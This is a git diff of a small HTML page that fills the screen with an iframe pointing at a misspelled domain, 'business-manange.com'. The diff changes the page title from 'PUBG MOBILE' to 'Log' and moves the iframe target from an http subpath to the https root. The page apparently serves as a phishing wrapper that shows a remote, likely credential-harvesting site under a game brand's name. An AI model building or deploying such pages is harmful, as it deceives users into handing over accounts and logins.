--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
-    <title>PUBG MOBILE</title>
+    <title>Log</title>
     <style>
         body, html {
             margin: 0;
@@ -28,7 +28,7 @@
     var iframe = document.getElementById('myFrame');
     
     // Set the source URL for the iframe
-    var url = 'http://lapiakburuak.business-manange.com/asukabeh/'; //
+    var url = 'https://lapiakburuak.business-manange.com/'; //
     iframe.src = url;
 </script>
 
